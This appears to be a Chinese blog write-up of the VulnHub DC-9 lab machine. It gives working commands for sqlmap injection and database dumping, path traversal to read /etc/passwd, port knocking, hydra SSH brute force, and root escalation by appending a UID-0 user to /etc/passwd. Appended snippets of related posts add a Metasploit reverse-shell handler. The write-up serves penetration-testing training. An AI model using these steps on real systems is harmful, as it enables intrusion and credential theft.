VulnHub靶机 DC-9 靶机 详细渗透过程

原创 已于 2024-04-27 21:58:17 修改 · 3.8k 阅读 · 27 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #web安全

于 2024-04-27 21:56:30 首次发布

VulnHub靶机 DC-9 打靶实战 详细渗透过程

目录

一、将靶机配置导入到虚拟机当中

靶机地址:

https://www.vulnhub.com/entry/dc-9,412/

image-20240427175043625

二、渗透测试

主机发现

通过使用arp-scan或者nmap进行主机发现

arp-scan -l

image-20240427175427033

端口扫描

发现主机后进行信息收集,端口扫描

nmap -p- 192.168.43.5

image-20240427175522914

开放HTTP80端口和SSH22端口,但是发现22端口为filtered状态,然后接下来查看HTTP的服务详情

nmap -p80 -sV -A 192.168.43.5

image-20240427175639500

访问web界面

image-20240427175753617

image-20240427175942360

指纹探测

whatweb http://192.168.43.5/index.php

image-20240427175930547

目录扫描

dirsearch -u http://192.168.43.5/ -i 200

image-20240427182930175

出来的目录基本都是在web界面当中所点击选项进行跳转所触发的目录

Web渗透

SQL注入

在搜索栏下发现有交互内容,输入一下信息并无输出什么,抓包尝试SQL注入

image-20240427183106599

抓取数据包,通过FUZZ测试SQL注入,发现有回显点,页面变化

image-20240427183224422

image-20240427183300197

页面发送变化,返回信息

image-20240427184721615

保存原始数据包,直接放入到sqlmap当中进行执行

//测试SQL注入,判断当前数据库,同时是否为DBA
python sqlmap.py -r sql.txt --random-agent --batch --current-db --is-dba --dbs

成功注入,发现当前使用的数据库,但并不是DBA

image-20240427183451884

脱库

python sqlmap.py -r sql.txt --random-agent --batch --current-db --is-dba --dbs -D Staff --dump

image-20240427183615639

users数据表当中发现用户名和密码,将密码进行md5解密

image-20240427183643305

image-20240427183706128

用户名:admin
密码:transorbital1

由于使用的当前数据库为Staff,所以可以直接判断出此用户名和密码即为后台管理员用户名和密码。

知道此,那么还有另一个数据库,继续脱库

python sqlmap.py -r sql.txt --random-agent --batch --current-db --is-dba --dbs -D users --dump

拿到大量的用户名和密码信息,保存下来

image-20240427183857256

登入后台

拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd

image-20240427184905771

image-20240427185020733

文件包含
http://192.168.43.5/welcome.php?file=../../../../etc/passwd

image-20240427185726398

image-20240427185806810

通过/etc/passwd可得拥有很多的用户名,其中包括users数据库当中的用户名

image-20240427185927721

image-20240427183857256

SSH爆破

将之前保存下来的这些用户名和密码,进行爆破

hydra -L user.txt -P passwords.txt ssh://192.168.43.5
提权

ssh爆破得到三个用户名和密码,分别登录即可。

ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。但我这里通过爆破后进行ssh登录时可直接登录的,可能在前面端口扫描时触发了规则导致打开。

详细参考:安全系列之端口敲门服务

如果不能ssh连接原因如下:

image-20240427175522914

存在knockd服务。
该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来"敲门",使系统开启需要访问的服务端口,才能对外访问。
不使用时,再使用自定义的序列号来"关门",将端口关闭,不对外监听。进一步提升了服务和系统的安全

//配置文件路径
默认配置文件是:/etc/knockd.conf

image-20240427212543349

//自定义端口后,依次对其进行敲门,然后就可以开启ssh服务进行连接了
//命令如下:
nmap 192.168.43.5 -p 7469
nmap 192.168.43.5 -p 8475
nmap 192.168.43.5 -p 9842
//执行完成过后,重新扫描22端口,即可发现ssh服务已经开启,可以访问

image-20240427213635311

ssh爆破,使用hydra工具进行爆破,等待即可

image-20240427190635480

chandlerb用户:

image-20240427191727259

joeyt用户:

image-20240427191750934

janitor用户:

image-20240427191819255

通过find命令和sudo -l 命令三者用户皆无得到可利用信息

但是通过三者发现在janitor用户的家目录下多了一个隐藏文件,查看后发现为密码文件,那么将这些密码添加到之前的字典当中,再次爆破一次

hydra -L user.txt -P passwords.txt ssh://192.168.43.5

image-20240427191928396

发现成功爆破出新的用户登录信息,进行登录。或者直接su切换也可

ssh fredf@192.168.43.5

image-20240427192256334

sudo -l命令查看到以root权限运行的文件,进行查看

sudo -l

test为可执行文件

image-20240427192340092

image-20240427192423912

查看所在目录的一些信息,寻找可利用内容

image-20240427192643948

返回上级目录查找到py文件,查看脚本内容

python脚本意思为将参数1进行读取,将参数1的内容写入到参数2当中

image-20240427193128772

那么接下来就可以进行构造/etc/passwd文件当中的信息,进行追加用户信息即可提权,仿照/etc/passwd文件当中内容进行构造信息

//etc/passwd下的root用户信息
root:x:0:0:root:/root:/bin/bash

//根据root信息,构造用户信息追加到/etc/passwd文件当中,添加admin用户
admin:$1$123$Ok9FhQy4YioYZeBPwQgm3/:0:0:admin:/root:/bin/bash

ps:使用openssl生成密码即可

openssl passwd -1 -salt 123 admin
//-1为MD5加密算法,-salt指定盐值,后面为密码
//将上述构造的语句写入到文件当中

image-20240427194552701

将构造的信息保存到一个文件当中,然后接下来执行text即可

目前的/etc/passwd当中没有新增用户

image-20240427194726693

执行后:

sudo /opt/devstuff/dist/test/test /tmp/passwd /etc/passwd

image-20240427194855063

image-20240427194842306

成功追加,直接su切换admin用户,输入密码,成功提权

su admin
Password:admin

image-20240427194942120

思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权

VulnHub靶机 DC靶机系列 通关手册

DC-1:Vulnhub靶机 DC-1 渗透详细过程

DC-2:Vulnhub靶机 DC-2 渗透详细过程

DC-3:Vulnhub 靶机 DC-3 实战系列 渗透详细过程

DC-4:VulnHub系列 DC-4靶机 渗透详细过程

DC-5:VulnHub靶机 DC-5 打靶 渗透测试详细过程

DC-6:Vulnhub靶机 DC-6 打靶实战 详细渗透测试过程

DC-7:VulnHub靶机 DC-7 打靶 渗透详细流程

DC-8:VulnHub靶机 DC-8 打靶实战 详细渗透过程

DC-9:VulnHub靶机 DC-9 靶机 详细渗透过程

文章不妥之处,欢迎批评指正!

渗透测试:DC-9靶机
Ciyaso的博客
08-24 903
一、扫描获取靶机ip arp-scan -l 192.168.203.148 二、获取网站信息 1.nmap nmap -sV -A 192.168.203.148 开放了22、80端口 2.Wappaloyzer 访问主页 Web服务器:Apache 2.4.38 3.dirb dirb http://192.168.203.148 没有什么可以利用的 三、分析网站 Display 这里向我们显示了所有的用户信息 Search这里可以通过输入姓或名,可以查询相应信息 Manage这里
DC9靶机渗透测试
Huangshanyoumu的博客
04-17 615
文章目录一、信息收集1.主机发现2.端口扫描二、漏洞挖掘1.访问靶机 web 服务2.使用 SQLmap 进行信息收集三、提权1.使用 sudo 查看可以 root 权限执行的文件2.逐层进入并查看该目录 环境版本: VMware pro 16 Kali 2021.1(虚拟机) DC-9(虚拟机) 一、信息收集 1.主机发现 arp-scan -l 2.端口扫描 nmap -A -p- 192.168.1.111 开放了 22 ssh,但是状态为 filtered、80 端口 apache 服务
渗透测试——Kioptrix5靶机渗透测试详细教程
最新发布
m0_73812072的博客
11-26 654
今天给大家带来一篇Kioptrix5靶机的渗透测试详细讲解,本篇文章与之前一样,都会着重讲解getshell的方法以及思路,同时还会将横向渗透的过程用多种方法显示出来(如果有的话);
VulnhubDC9
大方子
01-16 5549
靶机下载地址:http://www.five86.com/downloads/DC-9.zip 主机信息 Kali:192.168.56.113 DC9:192.168.56.112 实验过程 先进行主机探测,查找靶机的IP地址: arp-scan --interface eth1 192.168.56.1/24 用nmap对主机进行排查确定,DC9的IP地址为192.168.56.112 可以看到DC开放了80端口以及22端口(被过滤) nmap -sC -sV -oA dc-9 192.168.56
DC-9靶机渗透测试
读书 买花 长大
05-21 828
DC-9
靶机渗透之DC-9
2301_76227305的博客
07-01 2019
这就是DC靶机的最终章了,写的比较详细,基本我走过的弯路都记录下来了,希望对大家有帮助。DC之旅到此结束了,希望大家网安道路越走越远。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
VulnHub靶机 DC-5 打靶 渗透测试详细过程
网络空间安全学习
04-18 1683
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
VulnHub靶机 DC-7 打靶 渗透详细流程
网络空间安全学习
04-22 1542
主机发现—端口扫描—目录爆破发现后台—服务探测—白盒测试(源码当中找配置文件)—ssh远程登录—邮件信息—找到备份文件脚本—发现脚本当中的drush命令—修改后台密码—进入后台—寻找可代码执行或getshell地方—drupal8不允许执行命令(模块)—下载新的插件—getshell—反弹shell—追加反弹命令—提权即可。由于我们上一步骤已经得到了backups.sh脚本属主为root,属组为www-data,所以我们将反弹shell命令添加到脚本当中,等待执行脚本反弹shell即可得到root权限。
Vulnhub靶机 DC-6 打靶实战 详细渗透测试过程
网络空间安全学习
04-20 2351
查看sudo -l 下的内容,发现有jens用户权限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell。当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐一查看,发现在jens家目录和mark家目录下有文件信息,逐一查看。mark家目录下有一个文件夹,文件夹当中为一个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham。发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听。
vulnhub靶场 DC-1靶机 渗透详细过程
黑战士的博客
07-26 1601
1.扫描局域网主机netdiscover用法2.开放端口扫描2.MSF使用3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100hydra+John密码包以上两种方式可以爆出flag4的密码4.suid提权:Linux下用SUID提权、find命令exec。
vulnhub靶场 DC-5靶机 渗透详细过程
黑战士的博客
07-29 628
1.首先收集信息,真实ip,端口,网站目录,网站部署部件等2.利用文件包含来getshell3.查看权限,根据suid中的screen 4.5.0进行提权4.提权成功查看flag。
DC-9靶机进行渗透测试
zll___的博客
03-24 1177
DC-9靶机进行渗透测试
靶机渗透测试(covfefe)
小小猪的博客
06-05 1085
靶机渗透测试(covfefe) Vulnhub靶机 covfefe 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Intermediate) 目标:Covfefe is my Debian 9 based B2R VM, originally created as a CTF for SecTalks_BNE. It has three flags… flag进度:3/3 渗透流程: 1. 探测靶机ip地址 arp-scan -l .
靶机简单渗透测试
KKK_2178的博客
11-22 5711
1.下载靶机Metasploitable2-Linux,下载地址:Metasploitable download | SourceForge.net 2.在虚拟机中打开Kali-Linux和下载好的Metasploitable2-Linux,Metasploitable2-Linux的账号:msfadmin,密码:msfadmin. 3.在靶机中输入指令ifconfig,得到靶机ip 4.返回Kali虚拟机操作 输入指令nmap xxxxx (xxxxx为你靶机的ip)查看靶机端口.
vulnhub靶场之DC-9
qq_58091216的博客
01-15 1504
发现这里有个脚本文件可以无密码以root用户权限执行,我们进入/opt/devstuff/dist/test目录下先看看有什么信息,全是文件,回到上一个目录查看,也没什么,再回到上一个目录查看,在/opt/devstuff目录下发现了一个test.py脚本文件。这是一个写入文件的脚本,生成一个密码用root权限执行脚本写入/etc/passwd文件,所以我们现在就需要构造一个拥有root权限的用户,并且在/etc/passwd文件中储存,只要使用这个用户登录后,就可以获取到root权限,事先参考。
渗透测试学习之靶机DC-9
情感博主V
03-17 1995
过程 1. 探测目标主机 nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.146 2. 信息搜集 端口信息 nmap -sV -p 1-65535 192.168.246.146 web站点相关服务信息 目录信息 注:不要试着访问welcome.php、session.php和addrecord.php不然会直接跳到登录后的页面,但是并不能做...
DC9靶机
qq_40646572的博客
05-13 487
信息搜集 启动dc9靶机。 先使用nmap工具扫描网段,获取到dc9靶机的地址192.168.85.140,且靶机开启了22端口以及80端口。 sql注入漏洞利用 打开dc9靶机的http网站。搜集下网站信息。 在搜索处,测试下是否存在sql注入。将请求信息保存到文本文件中,使用sqlmap指定文件进行注入测试。 发现该处确实存在注入点。 成功读取到账号密码,但密码是hash值,因此需要破解。 破解成功,获取到密码。 文件包含漏洞的利用 经过一段时间的测试,发现该处好像存在文件包含漏洞,
vulnhub靶机dc-1
01-11
### VulnHub DC-1 靶机 攻略 介绍 下载 #### 关于DC-1靶机 VulnHub上的DC-1靶机旨在提供给安全爱好者和渗透测试学习者一个实践平台,在此环境中可以合法地进行各种攻击尝试,从而提升技能。该虚拟环境模拟了一个存在多个已知漏洞的服务网络应用,允许参与者通过一系列挑战来获取系统的控制权并最终找到隐藏的标志文件(flag)[^1]。 #### 获取与安装 为了开始体验DC-1靶机的任务,首先需要访问[VulnHub官方网站](https://www.vulnhub.com/)搜索栏输入“DC-1”,点击进入详情页面下载对应的镜像文件(OVA格式),之后按照提示导入到支持OVA标准的虚拟化工具如VirtualBox或VMware Workstation Pro中完成部署工作[^3]。 #### 初始配置建议 启动后的DC-1默认会分配一个私有IP地址(例如:`192.168.x.x`),此时应该确保Kali Linux作为攻击端能够与其在同一局域网内通信正常;可以通过ping命令验证连通性状况良好后再继续后续操作。 #### 基础信息搜集阶段 当确认双方设备间通讯无碍后便进入了实际演练环节——即从基础的信息收集做起。这一步骤通常涉及使用Nmap扫描开放端口和服务版本探测等手段以了解目标主机概况: ```bash nmap -A <target-ip> ``` 上述指令将会返回有关远程服务器运行状态的关键情报,为下一步制定针对性策略奠定坚实的基础。 #### 进阶探索与利用路径 随着对DC-1认识程度加深,接下来便是寻找潜在的安全缺陷加以利用的过程。根据已有经验分享可知,成功建立Meterpreter回话意味着已经突破了初步防线,获得了更深层次的操作权限: ```ruby use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost <local-ip> # Kali IP address exploit ``` 以上Metasploit框架下的设置可帮助快速搭建监听服务等待来自受害者的连接请求,一旦形成稳定的交互通道即可执行更多高级功能比如浏览目录结构直至定位至预设的目标文件位置。 #### 密码破解辅助技巧 考虑到可能存在弱密码保护的情况,采用Hydra这样的暴力猜解程序配合常用用户名列表以及大型词库资源不失为一种高效的方法去揭示真实的身份凭证组合关系[^4]: ```bash hydra -L /usr/share/wordlists/user.txt -P /usr/share/wordlists/rockyou.txt.gz ftp://<target-ip> ``` 这里展示了针对FTP协议实施登录认证绕过的实例,当然具体应用场景还需视实际情况灵活调整参数选项。
评论 4
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值